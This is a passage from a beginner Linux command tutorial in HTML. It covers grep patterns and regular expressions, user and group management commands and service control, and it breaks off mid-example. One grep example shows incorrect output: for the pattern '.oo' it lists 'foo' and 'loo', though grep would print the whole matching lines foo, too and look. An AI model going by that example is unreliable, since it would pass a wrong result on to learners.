<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">syntax:<span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep xyz file</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep searches for the pattern ‘xyz’ in ‘file’ and returns those rows which have that pattern present in them.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You can pass the output of any command to grep by piping it. </span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ls | grep hack</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This command lists all the files in current directory which contain the string “hack”</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" />The ultimate power of grep is understood when used with wild-cards & regular expressions.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Wild-card </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (dot)</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">“.” matches exactly 1 character </span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for example:</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$cat file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">foo</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">too</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">look</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$grep ‘.oo’ file</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">foo</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">loo</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To search for strings having “.” in them, we use ‘\’ escape character</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">e.g. To search for “google.com” </span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$grep ‘google\.com’ file</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Repetition *</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$grep ‘lo*k’ file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">look</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">character followed by * matches with any number of occurrences of that character.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: italic; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">“.*” matches with any string as expected</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Regular expressions</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Below table shows the use of regexp in grep with examples</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr"><table style="border-bottom-style: none; border-collapse: collapse; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; width: 624px;"><colgroup><col width="*"></col><col width="*"></col><col width="*"></col><col width="*"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Regexp</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Description</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Use</span></td><td style="background-color: white; border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches</span></td></tr>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[ ]</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches a selection of characters. Range of characters can also be provided.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In short [ ] acts as a placeholder for 1 character within the brackets.</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep “[Gg]oogle” file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep [a-c]d</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">google,Google</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ad,bd,cd</span></td></tr>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">^</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This can be used as negation. </span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This can also be used as the beginning of a line.</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep [^a]d </span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep ^[ ]*hello</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">bd,cd,... but not ad</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches lines having hello at the beginning of the line.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hello world</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> hello</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This will not be matched: hi hello</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches the end of the line</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep hello$</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches lines with hello at the end.</span></td></tr>
</tbody></table></div><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is it for grep in this intro, but there are a lot of things that can be done with regular expressions. Refer grep man page for that!</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Managing users and groups</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To add a new user to the system:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$useradd bob</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When a user is added without mentioning the group, Linux automatically creates a new group with the same name as the user name just added.</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #000099; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$useradd -g admins alice</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This will add the user alice to group of admins.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When each new user first logs in, they are prompted for their new permanent password.</span><span style="background-color: white; color: black; font-family: Arial; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To add a new group to the system:</span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$groupadd developers</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This will add a group with name developers.</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Changing password:</span><br />
<span style="background-color: white; color: #cc0000; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$passwd alice</span><span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Changing password for user alice</span><br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">New password: <br class="kix-line-break" />Retype new password: <br class="kix-line-break" />passwd: all authentication tokens updated successfully.</span><span style="background-color: #f9f9f9; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deleting a user:</span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$userdel bob</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deletes the user bob but keeps the data.</span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$userdel -r bob</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deletes the user as well as deletes all the data from that user’s home folder.</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: small; white-space: normal;"></span></span><br />
<div style="background-color: transparent;"><span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span id="internal-source-marker_0.0038698429707437754" style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Starting/stopping services</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">All the installed services go to the /etc/init.d/ directory.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To check the status of a service:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/<service> status</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">replace <service> with the name of service you want to check.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">example:</span><br />
